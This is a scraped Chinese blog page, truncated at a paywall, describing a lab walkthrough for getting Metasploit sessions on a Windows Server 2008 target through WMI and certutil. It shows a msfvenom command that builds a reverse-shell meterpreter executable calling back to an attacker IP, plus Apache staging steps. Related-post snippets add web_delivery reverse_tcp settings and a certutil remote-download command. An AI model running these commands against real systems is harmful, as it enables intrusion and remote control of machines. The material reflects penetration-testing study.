WMI远程命令执行上线msf

最新推荐文章于 2024-06-11 11:23:00 发布
最新推荐文章于 2024-06-11 11:23:00 发布
阅读量1.6k 收藏
点赞数 1
分类专栏: 内网渗透 文章标签: WMI 远程命令执行 powershell下载 certutil wmi横向
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SheXinK/article/details/102989677
版权

WMI命令执行与Certutil.exe上线msf

1、 测试环境

攻击机Kali:192.168.11.131
靶机Server2008:192.168.11.133 (135端口默认开启)

2、 Payload下载

2.1 生成Payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.11.131 LPORT=4444 -f exe > msf.exe

2.2 搭建下载环境

启动Kali Apache 服务,将生成的exe放到Apache 默认目录下,尝试访问正常弹出下载框

service apache2 start
mv msf.exe /var/www/html/

2.3 下载Payload

方法一:powershell下载
cscript.
最低0.47元/天 解锁文章
SheXinK
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
微信远程代码执行漏洞(最新版本利用)-亲测已上线
xxx9686的博客
09-18 462
1.最新版微信调用第三方浏览器不行2.旧版本微信条件,需要内置浏览器停留在窗口。3.360拦截微信浏览器触发漏洞。
记一次weblogic反序列化到内网域控上线
三天不打上房揭瓦的博客
04-02 580
声明:文中涉及到的技术和工具,仅供学习使用,禁止从事任何非法活动,如因此造成的直接或间接损失,均由使用者自行承担责任。
Windows安全基础——Windows WMI详解
最新发布
Innocence_0的博客
06-11 490
WMI(Windows Management Instrumentation, Windows管理规范)是Windows2000/XP管理系统的核心,属于管理数据和操作的基础模块。设计WMI的初衷是达到一种通用性,通过WMI操作系统、应用程序等来管理本地或者远程资源。它支持分布式组件对象模型(DCOM,DistributionModel)和Windows远程管理(WinRM),用户可通过WMI服务访问、配置、管理和监视Windows所有资源的功能。
实战微信远程代码执行线msf
自强不息
06-07 300
​​何必择地,何必择时,但问立志之真不真尔
线MSF(Metasploit)的几种常见方式
qq_46258964的博客
04-14 9316
powershell上线 利用powershell上线msf 对应模块use exploit/multi/script/web_delivery use exploit/multi/script/web_delivery set target 2 set payload windows/x64/meterpreter/reverse_tcp set lhost 172.16.1.10 set lport 6666 run 复制对应的powershell代码到Windows主机中执行便可以上线msf m
WMI使用学习笔记
crowsec
10-21 3905
本文大量参考了师傅们的文章,感谢各位师傅的帮助! WMI的全名为"Windows Management Instrumentation"。 从win98开始,Windows操作系统都支持WMIWMI可以在本地或者远程管理计算机系统。比如:重启,关机,关闭进程,创建进程等。
wmi4j 远程执行cmd命令获取命令执行的结果
06-04
使用wmi4j 连接远程主机获取进程列表,创建文件夹、共享文件夹、执行netstat -ano输出到aa.txt文件,读取文件、撤销文件夹共享、删除文件夹及aa.txt文件;即实现远程执行cmd命令获取命令执行的结果的效果。
Python利用WMI实现ping命令的例子
09-18
在这个例子中,我们将探讨如何使用Python通过WMI执行ping命令。 首先,确保已经安装了`pywin32`库,因为`win32api`是这个库的一部分。如果尚未安装,可以使用pip进行安装: ``` pip install pywin32 ``` 接下来...
WMI远程操作调用代码
03-22
在这个主题中,我们将深入探讨如何利用WMI进行远程操作,特别是注册表操作以及执行远程CMD命令。 1. **WMI基础** - WMI是基于WBEM(Web-Based Enterprise Management)标准的,它通过COM接口提供了一种统一的方式...
vc-wmi.zip_vc wmi_wmi_wmi vc_wmi 远程
09-20
vc下利用wmi,连接到远程主机的步骤,以及需要注意的问题说明
MSF 内网渗透(案例)
热门推荐
3569
06-03 2万+
0x00 前言虽然渗透,但是不常使用msf进行内网渗透,这篇刚好的弥补了 win 和 linux shell 和 msf 的对接的流程。原文 : https://mp.weixin.qq.com/s/sKXWjgaViYsCjG33-5Ey8Q0x01 案例分析实验环境:目标环境:10.0.0.0/24, 10.0.1.0/24攻击主机:10.0.0.5 (Kali), 10.0.0.7 (Win...
渗透测试中的certutil
weixin_44216796的博客
01-15 715
certutil简介 用于证书管理 支持xp-win10 更多操作说明见https://technet.microsoft.com/zh-cn/library/cc755341(v=ws.10).aspx 渗透测试中的应用 保存在当前路径,文件名称同URL certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/version.txt 保存在当前路径,指定保存文件名称 ce
免杀技术以及木马处理
weixin_51339377的博客
03-18 1443
免杀 如果需要深入了解 相关知识补充:破解、二进制、逆向工程 本次用到的病毒绕过检测网站: virustotal.com/gui/ 杀毒软件原理: 1.扫描技术:扫描压缩包:对压缩包内容进行分析检查 2.程序篡改防护:避免感染文件 3.修复技术:对受损文件进行还原 4.急救盘杀毒:利用空白的u盘制作进行杀毒 5.智能扫描:扫描常用磁盘和系统关键位置 6.全盘扫描:所有地方都扫描 7.勒索软件防护:保护电脑文件不被加密 8.开机扫描:扫描可能不需要...
一条命令线MSF(Metasploit)-web_delivery模块
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
10-31 2523
一条命令线MSF(Metasploit)-web_delivery模块
DAY39:横向渗透
qq_49433473的博客
08-28 1766
哈希传递攻击概述(PTH) 、横向渗透横向移动工具合集使用及方法、Mimikatz 、Procdump+Mimikatz、psexec 、msf、CrackMapExec批量横向渗透、WMI 命令、Invoke-WmiCommand(PowerShell)
MSF从上线到提权
m0_53087192的博客
01-07 1070
环境 攻击机:kali ip:192.168.232.129 被攻击机:win7 ip:192.168.232.140 MSF木马生成 windows_x86_payload msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.232.129 LPORT=4444 -f exe > shell.exe windows_x64_payload msfvenom -p windows/x64/meterpreter/reverse_tcp
利用msf实现windows的上线与提权
weixin_52049485的博客
01-07 1638
环境部署 攻击机:Kali ip:192.168.208.138 靶机:Win7(x64) ip:192.168.208.142 Payload (因为是靶机测试,可以在Kali开启apache2服务或者使用WinSCP将木马传入目标靶机,方便后面监听) msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.208.138 LPORT=6666 -f exe > reverse.exe 开启监听 use exploit/mult
Windows管理 instrumentation (WMI) 远程协议详解
"MS-WMI 文件描述了 Windows Management Instrumentation (WMI) 远程协议,这是一个基于 Distributed Component Object Model (DCOM) 的框架,用于开放和自动化的系统管理。WMI 利用 Common Information Model (CIM)...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值